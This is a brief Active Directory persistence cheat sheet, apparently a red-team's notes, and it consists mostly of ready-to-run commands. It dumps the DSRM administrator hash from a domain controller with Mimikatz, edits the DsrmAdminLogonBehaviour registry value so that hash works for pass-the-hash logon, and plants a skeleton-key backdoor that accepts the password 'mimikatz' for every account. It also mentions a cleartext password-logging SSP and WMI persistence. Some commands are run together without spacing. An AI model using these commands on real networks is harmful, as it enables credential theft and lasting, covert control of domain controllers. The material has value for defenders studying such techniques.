Run "PersistWMI", this will execute along another program. E.g. the victim opens chrome our persistence calls back.
SRM
Directory Services Restore Mode Password only needed on promotion to DC, rarely used and changed, so we either obtain or change it:
Invoke-Mimikatz-Command'"token::elevate" "lsadump::sam"'-ComputerName<dc>Invoke-Mimikatz-Command'"lsadump::lsa /patch"'-ComputerName<dc># Compare hashes, first one is DSRM# We can pth into the dc with the ntlm hash of the dsrm, but first we have to change his logon behaviourEnter-PSSession-Computername<dc>New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD
# Pth into itInvoke-Mimikatz-Command'"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
Custom SSP
Security Support Provider, with mimikatz, mimilib.dll, which logs all passwords in cleartext:
# This lets you log into every account with the password "mimikatz", you should compile it yourself and change that probably. You might also need to remove process protection before running it
Invoke-Mimikatz-Command'"privilege::debug" "misc::skeleton"'-ComputerName<name>